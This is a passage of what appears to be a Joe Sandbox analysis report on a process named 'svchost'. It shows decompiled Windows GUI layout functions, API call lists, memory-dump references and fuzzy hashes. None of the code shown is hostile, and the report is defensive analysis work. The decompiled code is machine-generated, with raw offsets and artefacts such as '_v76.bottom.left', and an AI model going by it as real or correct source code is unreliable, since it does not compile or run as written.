						_t149 =  *((intOrPtr*)(_t258 + 0x1c));
						_t265 = _t149 - _t237;
						if(_t149 > _t237) {
							_t237 = _t149;
						}
					}
					E00489512(_t258 + 0x34,  *((intOrPtr*)(_t258 + 0x10)));
					_t103 =  *(_t244 + 0x4c);
					 *((intOrPtr*)(_t258 + 0x4c)) = 0xffffffff;
					_t169 = _t103 + _t103;
					_t155 = _t154 + _t169;
					_t31 = _t103 * 2; // 0x2
					 *((intOrPtr*)(_t258 + 0x14)) = _t237 + _t169 + _t31 + 2;
					E00489C88(_t258 + 0x30, _t265);
					L11:
					_t171 =  *(_t244 + 0x3c);
					 *(_t244 + 0x40) = 7;
					_t239 = ((0x92492493 * _t171 >> 0x20) + _t171 >> 2) + ((0x92492493 * _t171 >> 0x20) + _t171 >> 2 >> 0x1f);
					asm("cdq");
					 *(_t244 + 0x44) = _t239;
					if(_t171 % 7 != 0) {
						 *(_t244 + 0x44) = _t239 + 1;
					}
					GetWindowRect( *(_t244 + 0x1c), _t258 + 0x20);
					_t54 = _t244 + 0x80; // 0x80
					_t240 = _t54;
					SetRect(_t240,  *(_t258 + 0x20),  *(_t258 + 0x24),  *(_t244 + 0x48) *  *(_t244 + 0x40) + ( *(_t244 + 0x4c) << 1) +  *(_t258 + 0x20),  *(_t244 + 0x44) *  *(_t244 + 0x48) + ( *(_t244 + 0x4c) << 1) +  *(_t258 + 0x24));
					if( *((intOrPtr*)( *(_t244 + 0x58) - 8)) != 0) {
						_t191 = _t240->left;
						if(_t155 > _t240->right - _t191) {
							 *((intOrPtr*)(_t244 + 0x88)) = _t191 + _t155;
						}
						_t138 =  *(_t244 + 0x4c);
						_t62 = _t244 + 0x70; // 0x70
						_t256 = _t62;
						_t192 = _t138 + _t138;
						_t155 = _t240->right - _t240->left - _t192;
						SetRect(_t256, _t138, _t138, _t138 + _t155, _t192 +  *((intOrPtr*)(_t258 + 0x14)));
						 *((intOrPtr*)(_t244 + 0x8c)) =  *((intOrPtr*)(_t244 + 0x8c)) + ( *(_t244 + 0x4c) << 1) - _t256->top + _t256->bottom;
					}
					if( *((intOrPtr*)( *(_t244 + 0x5c) - 8)) != 0) {
						_t215 = _t240->left;
						if(_t155 > _t240->right - _t215) {
							 *((intOrPtr*)(_t244 + 0x88)) = _t215 + _t155;
						}
						_t132 =  *(_t244 + 0x4c);
						_t77 = _t244 + 0x60; // 0x60
						_t159 = _t77;
						SetRect(_t159,  *(_t244 + 0x4c), _t240->bottom - _t240->top, _t240->right -  *(_t244 + 0x4c) +  *(_t244 + 0x4c) - _t240->left + _t132, _t240->bottom - _t240->top + _t132 +  *((intOrPtr*)(_t258 + 0x14)));
						 *((intOrPtr*)(_t244 + 0x8c)) =  *((intOrPtr*)(_t244 + 0x8c)) + ( *(_t244 + 0x4c) << 1) - _t159->top + _t159->bottom;
					}
					_t156 = GetSystemMetrics(1);
					_t122 = GetSystemMetrics(0);
					_t178 =  *((intOrPtr*)(_t244 + 0x88));
					if(_t178 > _t122) {
						OffsetRect(_t240, _t122 - _t178, 0);
					}
					_t123 = _t240->left;
					if(_t123 < 0) {
						OffsetRect(_t240,  ~_t123, 0);
					}
					_t124 =  *((intOrPtr*)(_t244 + 0x8c));
					if(_t124 > _t156) {
						OffsetRect(_t240, 0, _t156 - _t124);
					}
					_t126 = E00487591(_t244, _t240->left, _t240->top, _t240->right - _t240->left, _t240->bottom - _t240->top, 1);
					 *[fs:0x0] =  *(_t258 + 0x44);
					return _t126;
				}
				_t198 =  *((intOrPtr*)(__ecx + 0x58));
				_t261 =  *((intOrPtr*)(_t198 - 8));
				if( *((intOrPtr*)(_t198 - 8)) == 0) {
					_t155 =  *((intOrPtr*)(_t258 + 0x10));
					goto L11;
				}
				goto L2;
			}
































    0x00448246
    0x00448248
    0x0044824d
    0x0044824e
    0x00448255
    0x0044825b
    0x00448266
    0x00448276
    0x00448276
    0x0044827b
    0x00448280
    0x0044828b
    0x0044829e
    0x004482a2
    0x004482a5
    0x004482a7
    0x004482ae
    0x004482bf
    0x004482c1
    0x004482c5
    0x004482c5
    0x004482c9
    0x004482d1
    0x004482e4
    0x004482e6
    0x004482ec
    0x004482ee
    0x004482ee
    0x004482f0
    0x004482f4
    0x004482f6
    0x004482f8
    0x004482f8
    0x004482f6
    0x00448303
    0x00448308
    0x0044830b
    0x00448313
    0x00448318
    0x0044831e
    0x00448322
    0x00448326
    0x00448331
    0x00448331
    0x0044833d
    0x00448350
    0x00448357
    0x0044835a
    0x0044835f
    0x00448362
    0x00448362
    0x0044836e
    0x00448388
    0x00448388
    0x004483a3
    0x004483b1
    0x004483b6
    0x004483bc
    0x004483c2
    0x004483c2
    0x004483c8
    0x004483d0
    0x004483d0
    0x004483d3
    0x004483dc
    0x004483e8
    0x00448405
    0x00448405
    0x00448413
    0x00448418
    0x0044841e
    0x00448422
    0x00448422
    0x00448428
    0x0044842e
    0x0044842e
    0x0044845b
    0x00448478
    0x00448478
    0x0044848a
    0x0044848c
    0x0044848e
    0x0044849c
    0x004484a4
    0x004484a4
    0x004484a6
    0x004484aa
    0x004484b2
    0x004484b2
    0x004484b4
    0x004484bc
    0x004484c4
    0x004484c4
    0x004484dd
    0x004484ea
    0x004484f4
    0x004484f4
    0x00448268
    0x0044826e
    0x00448270
    0x0044832d
    0x00000000
    0x0044832d
    0x00000000

    APIs
    • GetTextExtentPoint32A.GDI32(?,?,?,00000090), ref: 004482BF
    • GetTextExtentPoint32A.GDI32(?,?,?,00000090), ref: 004482E4
    • GetWindowRect.USER32(?,?), ref: 0044836E
    • SetRect.USER32(00000080,?,?,?,?), ref: 004483A3
    • SetRect.USER32(00000070,?,?,?,?), ref: 004483E8
    • SetRect.USER32(00000060,?,?,?,?), ref: 0044845B
    • GetSystemMetrics.USER32(00000001), ref: 00448486
    • GetSystemMetrics.USER32(00000000), ref: 0044848C
    • OffsetRect.USER32(00000080,00000000,00000000), ref: 004484A4
    • OffsetRect.USER32(00000080,00000000,00000000), ref: 004484B2
    • OffsetRect.USER32(00000080,00000000,00000000), ref: 004484C4
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Rect$Offset$ExtentMetricsPoint32SystemText$Window
    • String ID:
    • API String ID: 1551820068-0
    • Opcode ID: a4446e18df96f2cbf0effb5a56dfcd503b649246b3a5402b6eb9c7abde7e1d6a
    • Instruction ID: e6903ee4ef3fb42ed25bba1d36a8c29607807c2b30cf0d31d990ba31daf3a844
    • Opcode Fuzzy Hash: a4446e18df96f2cbf0effb5a56dfcd503b649246b3a5402b6eb9c7abde7e1d6a
    • Instruction Fuzzy Hash: 0C912971200B05AFD318CF69C985E6AF7E6FB88700F048A2DA99AC7754EB75FC058B54
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004127C0 Relevance: 16.7, APIs: 11, Instructions: 169windowCOMMON
    Download Yara Rule
    C-Code - Quality: 96%
    			E004127C0(void* __ebx, void* __ecx, void* __edi, void* __ebp) {
				intOrPtr _v8;
				struct HDC__* _t54;
				int _t63;
				int _t64;
				intOrPtr _t71;
				long _t76;
				intOrPtr _t90;
				intOrPtr _t91;
				intOrPtr _t92;
				intOrPtr _t119;
				void* _t123;
				void* _t124;
				void* _t125;
				intOrPtr _t126;
				void* _t129;

				_t129 = __ecx;
				_t54 =  *(__ecx + 0x24c);
				if(_t54 == 0) {
					L46:
					return _t54;
				} else {
					_t123 = __ecx + 0x260;
					if(_t123 == 0 ||  *((intOrPtr*)(_t123 + 4)) == 0) {
						 *((intOrPtr*)( *((intOrPtr*)(_t129 + 0x248)) + 0x24))(7);
					} else {
						if(_t123 != 0) {
							_t92 =  *((intOrPtr*)(_t123 + 4));
						} else {
							_t92 = 0;
						}
						if(GetCurrentObject(_t54, 1) != _t92) {
							E00489512(_t129 + 0x248, _t123);
						}
					}
					_t124 = _t129 + 0x268;
					if(_t124 == 0 ||  *((intOrPtr*)(_t124 + 4)) == 0) {
						 *((intOrPtr*)( *((intOrPtr*)(_t129 + 0x248)) + 0x24))(0);
					} else {
						if(_t124 != 0) {
							_t91 =  *((intOrPtr*)(_t124 + 4));
						} else {
							_t91 = 0;
						}
						if(GetCurrentObject( *(_t129 + 0x24c), 2) != _t91) {
							E00489512(_t129 + 0x248, _t124);
						}
					}
					_t125 = _t129 + 0x270;
					if(_t125 == 0 ||  *((intOrPtr*)(_t125 + 4)) == 0) {
						 *((intOrPtr*)( *((intOrPtr*)(_t129 + 0x248)) + 0x24))(0x11);
					} else {
						if(_t125 != 0) {
							_t90 =  *((intOrPtr*)(_t125 + 4));
						} else {
							_t90 = 0;
						}
						if(GetCurrentObject( *(_t129 + 0x24c), 6) != _t90) {
							 *((intOrPtr*)( *((intOrPtr*)(_t129 + 0x248)) + 0x28))(_t125);
						}
					}
					if(_v8 != 1) {
						_t126 =  *((intOrPtr*)(_t129 + 0x58));
					} else {
						_t126 =  *((intOrPtr*)(_t129 + 0x5c));
					}
					if(GetTextColor( *(_t129 + 0x250)) != _t126) {
						 *((intOrPtr*)( *((intOrPtr*)(_t129 + 0x248)) + 0x30))(_t126);
					}
					if( *((intOrPtr*)(_t129 + 0x60)) == 0xff000000) {
						if(GetBkMode( *(_t129 + 0x250)) != 1) {
							E004895EE(_t129 + 0x248, 1);
						}
						if(GetBkColor( *(_t129 + 0x250)) == 0xffffff) {
							goto L40;
						} else {
							_t71 =  *((intOrPtr*)(_t129 + 0x248));
							_push(0xffffff);
							goto L39;
						}
					} else {
						if(GetBkMode( *(_t129 + 0x250)) != 2) {
							E004895EE(_t129 + 0x248, 2);
						}
						_t76 = GetBkColor( *(_t129 + 0x250));
						_t119 =  *((intOrPtr*)(_t129 + 0x60));
						if(_t76 == _t119) {
							L40:
							_t63 = GetROP2( *(_t129 + 0x250));
							_t101 =  *((intOrPtr*)(_t129 + 0x48)) + 1;
							if(_t63 !=  *((intOrPtr*)(_t129 + 0x48)) + 1) {
								E0048964A(_t129 + 0x248, _t101);
							}
							_t64 = GetStretchBltMode( *(_t129 + 0x250));
							if(_t64 != E004204B0()) {
								E00489678(_t129 + 0x248, E004204B0());
							}
							_t54 = GetPolyFillMode( *(_t129 + 0x250));
							if(_t54 == 2) {
								goto L46;
							} else {
								return E0048961C(_t129 + 0x248, 2);
							}
						} else {
							_t71 =  *((intOrPtr*)(_t129 + 0x248));
							_push(_t119);
							L39:
							 *((intOrPtr*)(_t71 + 0x2c))();
							goto L40;
						}
					}
				}
			}


















    0x004127c1
    0x004127c3
    0x004127cb
    0x004129e5
    0x004129e5
    0x004127d1
    0x004127da
    0x004127e2
    0x0041281b
    0x004127eb
    0x004127ed
    0x004127f3
    0x004127ef
    0x004127ef
    0x004127ef
    0x004127fd
    0x00412806
    0x00412806
    0x004127fd
    0x0041281e
    0x00412826
    0x00412865
    0x0041282f
    0x00412831
    0x00412837
    0x00412833
    0x00412833
    0x00412833
    0x00412847
    0x00412850
    0x00412850
    0x00412847
    0x00412868
    0x00412870
    0x004128b3
    0x00412879
    0x0041287b
    0x00412881
    0x0041287d
    0x0041287d
    0x0041287d
    0x00412891
    0x004128a0
    0x004128a0
    0x00412891
    0x004128bb
    0x004128c2
    0x004128bd
    0x004128bd
    0x004128bd
    0x004128d4
    0x004128e3
    0x004128e3
    0x004128ed
    0x00412941
    0x0041294b
    0x0041294b
    0x00412962
    0x00000000
    0x00412964
    0x00412964
    0x00412970
    0x00000000
    0x00412970
    0x004128ef
    0x004128ff
    0x00412909
    0x00412909
    0x00412915
    0x0041291b
    0x00412920
    0x00412978
    0x0041297f
    0x00412988
    0x0041298b
    0x00412994
    0x00412994
    0x004129a0
    0x004129b2
    0x004129c0
    0x004129c0
    0x004129cc
    0x004129d5
    0x00000000
    0x004129d7
    0x00000000
    0x004129df
    0x00412922
    0x00412922
    0x0041292e
    0x00412975
    0x00412975
    0x00000000
    0x00412975
    0x00412920
    0x004128ed

    APIs
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Mode$ColorCurrentObject$FillPolyStretchText
    • String ID:
    • API String ID: 544274770-0
    • Opcode ID: 9b59efc0e278b279504834f3f31008d29a785bf548e72ea1c658155bc1236caf
    • Instruction ID: d9bf0422f064176de89f7a77b2ccb0f73d6f2a71fc3de3935330b70509fd61df
    • Opcode Fuzzy Hash: 9b59efc0e278b279504834f3f31008d29a785bf548e72ea1c658155bc1236caf
    • Instruction Fuzzy Hash: DC515071210A019BC764EB64CA88BEBB3A5FF44305F144A1EE26FD7260DB74F895CB58
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00422700 Relevance: 15.3, APIs: 10, Instructions: 288COMMON
    Download Yara Rule
    C-Code - Quality: 85%
    			E00422700(void* __ecx, void* __eflags) {
				int _v4;
				intOrPtr _v12;
				int _v40;
				int _v44;
				struct tagRECT _v60;
				struct tagRECT _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				int _v88;
				signed int _v104;
				long _v108;
				intOrPtr _v116;
				void* __edi;
				void* __ebp;
				intOrPtr _t80;
				int _t83;
				intOrPtr _t89;
				long _t96;
				int _t98;
				signed int _t101;
				intOrPtr _t112;
				void* _t123;
				void* _t139;
				void* _t140;
				int _t142;
				void* _t144;
				intOrPtr _t149;
				intOrPtr _t150;
				signed int _t189;
				void* _t199;
				signed int _t203;
				intOrPtr* _t205;
				long _t206;
				void* _t209;
				intOrPtr _t212;
				intOrPtr _t215;
				void* _t216;

				_push(0xffffffff);
				_push(E0048ED3A);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t215;
				_t216 = _t215 - 0x48;
				_push(_t199);
				_t209 = __ecx;
				E004845FE(__ecx, _t199);
				_t200 = 0;
				if( *(_t209 + 0x7c) == 0) {
					_t212 =  *((intOrPtr*)(_t209 + 0x74));
					if(_t212 <= 0) {
						goto L10;
					} else {
						if(_t212 != 0) {
							_t200 =  *((intOrPtr*)(_t209 + 0x6c));
						}
						if(E004267F0(_t200, _t212) == 0) {
							_t139 = E0041F240(_t200, _t212);
							_t216 = _t216 + 8;
							if(_t139 == 1) {
								L9:
								 *(_t209 + 0x7c) = 2;
							} else {
								_t140 = E00428200(_t200, _t212);
								_t216 = _t216 + 8;
								if(_t140 == 1) {
									goto L9;
								}
							}
							goto L10;
						} else {
							_t142 = 1;
							 *(_t209 + 0x7c) = 1;
						}
					}
				} else {
					 *(_t209 + 0x7c) = 0;
					L10:
					_t142 = 1;
				}
				if( *((intOrPtr*)(_t209 + 0x78)) == _t142) {
					E00487663(E00487410(_t209, 6), 0);
					E00487663(E00487410(_t209, 3), 0);
					E00487663(E00487410(_t209, _t142), 0);
				}
				_t80 =  *((intOrPtr*)(_t209 + 0x60));
				if(_t80 == 0xb) {
					L15:
					_t149 = _t209 + 0x80;
				} else {
					_t149 = _t209 + 0xbc;
					if( *((intOrPtr*)(_t209 + 0x78)) == _t142) {
						goto L15;
					}
				}
				 *((intOrPtr*)(_t209 + 0xf8)) = _t149;
				if(_t80 != 0xc) {
					if( *(_t209 + 0x7c) == _t142) {
						_t206 = E00483003(0x104);
						_t216 = _t216 + 4;
						_v76.left = _t206;
						_v4 = 0;
						if(_t206 == 0) {
							_t206 = 0;
						} else {
							E0043A2C0(_t206);
							 *((intOrPtr*)(_t206 + 0xf8)) = 0x49673c;
							 *((intOrPtr*)(_t206 + 0xfc)) = 0;
							 *_t206 = 0x4968d8;
							 *((intOrPtr*)(_t206 + 0xf4)) = 0;
							 *(_t206 + 0x100) = _t142;
						}
						 *(_t209 + 0xfc) = _t206;
						_v4 = 0xffffffff;
						E00489EBE(_t206 + 0xf8, CreateSolidBrush(0xffffff));
						 *( *(_t209 + 0xfc) + 0xdc) = 0xffffff;
						GetWindowRect( *(_t209 + 0xd8),  &(_v60.bottom));
						E00489A84(_t209,  &(_v60.bottom));
						_push(0);
						_push(0x469);
						_t200 =  *( *(_t209 + 0xfc));
						_push(_t209);
						_push( &(_v60.right));
						_push(0x50800000);
						_push(0);
						_t123 = GetStockObject(5);
						_push(E004858C5(0, LoadCursorA(0, 0x7f00), _t123, 0));
						if( *((intOrPtr*)( *( *(_t209 + 0xfc)) + 0x54))() == 0) {
							E004862B9(_t209, 0x4b1b68, 0x4b1a98, 0x10);
							 *(_t209 + 0x7c) = 0;
						}
						E0043C250( *(_t209 + 0xfc), 2);
					}
					_t83 =  *(_t209 + 0x7c);
					if(_t83 == 0) {
						_t149 =  *((intOrPtr*)(_t209 + 0xf8));
						_push(8);
						goto L31;
					} else {
						if(_t83 == 2) {
							_t89 = E00487410(_t209, 5);
							_v80 = _t89;
							GetWindowRect( *(_t89 + 0x1c),  &_v60);
							GetWindowRect( *( *((intOrPtr*)(_t209 + 0xf8)) + 0x1c),  &_v76);
							_t189 = _v76.top;
							_t203 = _v60.top - _t189;
							GetWindowRect( *(_t209 + 0x1c),  &_v76);
							_t96 = _v76.bottom.left - _t203;
							_v76.bottom.left = _t96;
							_t144 = _t96 - _v76.top;
							_t98 = GetSystemMetrics(1);
							asm("cdq");
							_t101 = _t98 - _t144 - _t189 >> 1;
							_v76.top = _t101;
							_v76.bottom.left = _t144 + _t101;
							E00487591(_t209, _v76.left, _t101, _v76.right - _v76.left, _t144 + _t101 - _t101, 1);
							_v104 =  ~_t203;
							_v76.bottom.left = 5;
							_v60.left = 7;
							_v60.top = 6;
							_v60.right = 3;
							_v60.bottom.left = 4;
							_v44 = 1;
							_v40 = 2;
							_t205 =  &(_v76.bottom);
							_v108 = 7;
							do {
								GetWindowRect( *(E00487410(_t209,  *_t205) + 0x1c),  &_v60);
								E00489A84(_t209,  &_v60);
								OffsetRect( &(_v76.bottom), 0, _v88);
								E00487591(E00487410(_t209,  *_t205), _v76.right, _v76.bottom.left, _v60.left - _v76.right, _v60.top - _v76.bottom.left, 1);
								_t205 = _t205 + 4;
								_t112 = _v116 - 1;
								_v116 = _t112;
							} while (_t112 != 0);
							E00487621(E00487410(_t209, 7), 8);
							_t200 = _v84;
							E00487621(_t200, 8);
							_t150 = _t200;
							goto L32;
						}
					}
				} else {
					_push(8);
					L31:
					E00487621(_t149);
					_t150 =  *((intOrPtr*)(_t209 + 0xf8));
					L32:
					E0048768A(_t150);
				}
				E00422480(_t209, _t200);
				 *[fs:0x0] = _v12;
				return 0;
			}








































    0x00422706
    0x00422708
    0x0042270d
    0x0042270e
    0x00422715
    0x0042271b
    0x0042271c
    0x0042271e
    0x00422726
    0x0042272a
    0x00422731
    0x00422736
    0x00000000
    0x00422738
    0x0042273c
    0x0042273e
    0x0042273e
    0x0042274a
    0x00422758
    0x0042275d
    0x00422763
    0x00422774
    0x00422774
    0x00422765
    0x00422767
    0x0042276c
    0x00422772
    0x00000000
    0x00000000
    0x00422772
    0x00000000
    0x0042274c
    0x0042274c
    0x00422751
    0x00422751
    0x0042274a
    0x0042272c
    0x0042272c
    0x0042277b
    0x0042277b
    0x0042277b
    0x00422783
    0x00422792
    0x004227a4
    0x004227b5
    0x004227b5
    0x004227ba
    0x004227c0
    0x004227cf
    0x004227cf
    0x004227c2
    0x004227c7
    0x004227cd
    0x00000000
    0x00000000
    0x004227cd
    0x004227d8
    0x004227de
    0x004227f2
    0x00422802
    0x00422804
    0x00422807
    0x0042280d
    0x00422815
    0x00422844
    0x00422817
    0x00422819
    0x00422820
    0x0042282a
    0x00422830
    0x00422836
    0x0042283c
    0x0042283c
    0x00422846
    0x00422851
    0x00422868
    0x00422878
    0x00422889
    0x00422892
    0x0042289d
    0x0042289f
    0x004228a8
    0x004228aa
    0x004228ab
    0x004228ac
    0x004228b1
    0x004228b7
    0x004228d9
    0x004228df
    0x004228ef
    0x004228f4
    0x004228f4
    0x00422903
    0x00422903
    0x0042290b
    0x0042290e
    0x00422a74
    0x00422a7a
    0x00000000
    0x00422914
    0x00422917
    0x00422921
    0x0042292f
    0x00422933
    0x00422944
    0x0042294d
    0x00422957
    0x00422959
    0x00422963
    0x00422967
    0x0042296d
    0x0042296f
    0x00422979
    0x00422980
    0x00422982
    0x00422989
    0x0042299b
    0x004229a7
    0x004229ab
    0x004229b3
    0x004229b7
    0x004229bf
    0x004229c7
    0x004229cf
    0x004229d7
    0x004229df
    0x004229e3
    0x004229e7
    0x004229fa
    0x00422a03
    0x00422a14
    0x00422a3e
    0x00422a47
    0x00422a4a
    0x00422a4b
    0x00422a4b
    0x00422a5e
    0x00422a63
    0x00422a6b
    0x00422a70
    0x00000000
    0x00422a70
    0x00422917
    0x004227e0
    0x004227e0
    0x00422a7c
    0x00422a7c
    0x00422a81
    0x00422a87
    0x00422a87
    0x00422a87
    0x00422a8e
    0x00422a9d
    0x00422aa7

    APIs
    • CreateSolidBrush.GDI32(00FFFFFF), ref: 0042285F
    • GetWindowRect.USER32(?), ref: 00422889
    • GetStockObject.GDI32(00000005), ref: 004228B7
    • LoadCursorA.USER32(00000000,00007F00), ref: 004228C5
    • GetWindowRect.USER32(?,?), ref: 00422933
    • GetWindowRect.USER32(?,?), ref: 00422944
    • GetWindowRect.USER32(?,?), ref: 00422959
    • GetSystemMetrics.USER32(00000001), ref: 0042296F
    • GetWindowRect.USER32(?,?), ref: 004229FA
    • OffsetRect.USER32(?,00000000,00000001), ref: 00422A14
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Rect$Window$BrushCreateCursorLoadMetricsObjectOffsetSolidStockSystem
    • String ID:
    • API String ID: 3805611468-0
    • Opcode ID: 7b52b9d85a0d96c78aa3691f5ee9f5ff6a6d96920106f39a5228658626a4595f
    • Instruction ID: 3c093d1a7ed56f4b32d8130247ea3491ab2f8cf374d530c487a91e4658cf990e
    • Opcode Fuzzy Hash: 7b52b9d85a0d96c78aa3691f5ee9f5ff6a6d96920106f39a5228658626a4595f
    • Instruction Fuzzy Hash: 6DA1CE70708701AFD724EF25C991B6FB7E5ABC4708F10492EF15687391EBB8E8058B5A
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00420FD0 Relevance: 15.2, APIs: 10, Instructions: 179COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00420FD0(intOrPtr __ecx, intOrPtr _a4) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				struct tagRECT _v32;
				struct tagRECT _v48;
				struct tagRECT _v64;
				struct tagRECT _v80;
				intOrPtr _v84;
				void* _t74;
				void* _t76;
				int _t81;
				intOrPtr _t84;
				intOrPtr _t85;
				long _t86;
				intOrPtr _t87;
				intOrPtr _t88;
				long _t92;
				intOrPtr _t93;
				intOrPtr _t94;
				intOrPtr _t95;
				intOrPtr _t114;
				intOrPtr _t121;
				intOrPtr _t127;
				intOrPtr _t128;
				long _t131;
				long _t134;
				intOrPtr _t135;
				intOrPtr _t136;
				intOrPtr _t137;
				long _t144;
				long _t149;
				long _t150;
				intOrPtr _t158;
				intOrPtr _t163;
				intOrPtr _t164;
				long _t166;

				_v84 = __ecx;
				GetWindowRect( *(__ecx + 0xa0),  &_v48);
				GetWindowRect( *(_a4 + 0x1c),  &_v64);
				_t121 = _v64.right;
				_t144 = _v64.left;
				_t74 = _v48.right - _v48.left;
				_t114 = _v64.top;
				_t158 = _v64.bottom;
				_v8 = _t121;
				_t166 = _t144;
				_v12 = _t114;
				_v4 = _t158;
				if(_t121 - _t144 > _t74) {
					_v64.right = _t74 + _t144;
				}
				_t76 = _v48.bottom - _v48.top;
				if(_t158 - _t114 > _t76) {
					_v64.bottom = _t76 + _t114;
				}
				IntersectRect( &_v80,  &_v64,  &_v48);
				_v32.top = _v80.top;
				_v32.right = _v80.right;
				_v32.left = _v80.left;
				_v32.bottom = _v80.bottom;
				_t81 = EqualRect( &_v32,  &_v64);
				if(_t81 == 0) {
					_t161 = _v84;
					GetWindowRect( *(_v84 + 0xdc),  &_v80);
					_t163 = _v64.top;
					_t84 = _v48.top;
					if(_t163 >= _t84) {
						_t127 = _v64.bottom;
						_t85 = _v48.bottom;
						if(_t127 > _t85) {
							_t163 = _t163 + _t85 - _t127;
						}
					} else {
						_t163 = _t84;
					}
					_t149 = _v64.left;
					_t86 = _v48.left;
					if(_t149 >= _t86) {
						_t128 = _v64.right;
						_t87 = _v48.right;
						if(_t128 > _t87) {
							_t149 = _t149 + _t87 - _t128;
						}
					} else {
						_t149 = _t86;
					}
					_t88 = _v80.top;
					_t164 = _t163 + _t88 - _v12;
					_t131 = _v80.left;
					_v64.top = _t164;
					_t150 = _t149 + _t131 - _t166;
					_v64.left = _t150;
					OffsetRect( &_v80,  ~(_t131 - _t150),  ~(_t88 - _t164));
					_t92 = _v80.left;
					_t134 = _v48.left;
					if(_t92 > _t134) {
						OffsetRect( &_v80,  ~(_t92 - _t134), 0);
					}
					_t135 = _v80.right;
					_t93 = _v48.right;
					if(_t135 < _t93) {
						OffsetRect( &_v80, _t93 - _t135, 0);
					}
					_t94 = _v80.top;
					_t136 = _v48.top;
					if(_t94 > _t136) {
						OffsetRect( &_v80, 0,  ~(_t94 - _t136));
					}
					_t137 = _v80.bottom;
					_t95 = _v48.bottom;
					if(_t137 < _t95) {
						OffsetRect( &_v80, 0, _t95 - _t137);
					}
					E00489A84(_t161 + 0x84,  &_v80);
					_t81 = E00487591(_t161 + 0xc0, _v84, _v80.left, _v80.top - _v84, _v80.right - _v80.left, 1);
				}
				return _t81;
			}







































    0x00420fdc
    0x00420fed
    0x00420ffc
    0x00420ffe
    0x00421006
    0x0042100a
    0x0042100e
    0x00421012
    0x00421016
    0x0042101e
    0x00421020
    0x00421024
    0x00421028
    0x0042102c
    0x0042102c
    0x00421038
    0x0042103e
    0x00421042
    0x00421042
    0x00421055
    0x00421067
    0x0042106b
    0x00421073
    0x00421081
    0x00421085
    0x0042108d
    0x00421093
    0x004210a3
    0x004210a5
    0x004210a9
    0x004210af
    0x004210b5
    0x004210b9
    0x004210bf
    0x004210c3
    0x004210c3
    0x004210b1
